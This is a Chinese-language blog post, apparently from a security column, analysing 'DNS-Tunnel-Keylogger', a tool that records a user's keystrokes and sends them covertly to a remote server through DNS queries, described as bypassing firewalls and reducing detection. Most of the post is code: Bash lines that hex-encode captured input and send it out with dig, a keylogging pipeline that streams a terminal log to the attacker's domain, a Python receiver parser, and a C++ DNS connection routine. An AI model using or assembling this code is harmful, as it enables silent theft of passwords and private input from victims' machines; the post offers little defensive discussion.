DNS-Tunnel-Keylogger DNS隧道键盘记录器分析

qife122

发布于 2025-06-16 09:07:00

12700

代码可运行

文章被收录于专栏：网络安全技术点滴分享网络安全技术点滴分享

运行总次数：0

代码可运行

系统功能概述

DNS-Tunnel-Keylogger实现了键盘记录并将数据通过DNS隧道隐蔽传输到服务端的功能，它绕过了防火墙并减少了被检测的风险，主要功能包括：

数据外泄传输：将数据通过DNS查询请求发送到指定的DNS服务器。
键盘记录：记录用户的键盘输入，并将记录的数据通过DNS协议发送到远程服务器。
数据编码与解码：将数据转换为十六进制格式进行传输，并在接收端进行解码。
连接管理：管理与远程DNS服务器的连接，包括连接的建立、数据包的发送与重试机制。

系统架构

该系统主要由以下几个模块组成：

DNS数据发送模块：负责将数据编码并通过DNS查询请求发送到远程服务器。
键盘记录模块：记录用户的键盘输入，并将记录的数据传递给DNS数据发送模块。
数据解析模块：在接收端解析从DNS查询请求中提取的数据，并将其还原为原始数据。
连接管理模块：负责与远程DNS服务器的连接管理，包括连接的建立、数据包的发送与重试机制。

主要核心技术点

DNS协议利用：通过DNS查询请求将数据编码并发送到远程服务器，利用DNS协议的隐蔽性进行数据传输。
数据编码：将数据转换为十六进制格式进行传输，确保数据在传输过程中不被篡改或丢失。
键盘记录：通过系统钩子（Hook）捕获用户的键盘输入，并将输入数据记录到日志文件中。
多平台支持：系统支持在Linux和Windows平台上运行，分别通过Bash脚本和C++代码实现。

核心代码分析

DNS数据发送模块（Bash脚本）

# 将数据编码为十六进制格式
data=$(echo "$letters" | xxd -ps -c 200 | tr -d '\n' | head -c -2)
# 将编码后的数据通过DNS查询请求发送到远程服务器
dig_out=$(dig $encoded A +short)

键盘记录模块（Bash脚本）

# 记录用户的键盘输入并保存到日志文件中
script -f -q -I "$log_file_path" 2> /dev/null
# 将日志文件中的内容通过DNS协议发送到远程服务器
tail -f "$log_file_path" | ./connection.sh "$domain" &

数据解析模块（Python）

# 解析接收到的数据包
class DataParser():
    def __init__(self, ip):
        self.last_received = -1
        self.data = bytearray()
        self.ip = ip
    def add(self, packet_number: int, data: bytes):
        if packet_number == self.last_received:  # 重复的数据包
            raise ShortCircuitException()
        if not (packet_number > self.last_received or packet_number == 0):
            self.last_received = 0
            raise PacketsOutOfOrderException()
        try:
            data.decode('ascii')
            self.data.extend(data)
        except:
            print("Unable decode last data packet: " + str(data))
        finally:
            self.last_received = packet_number

连接管理模块（C++）

// 建立与远程DNS服务器的连接
int startConnection(const char* domain) {
    // 发送DNS查询请求以建立连接
    DNS_STATUS status = DnsQuery(domain, DNS_TYPE_A, DNS_OPTIONS, NULL, &dnsRecord, NULL);
    if (status != 0) {
        return -1;
    }
    return 0;
}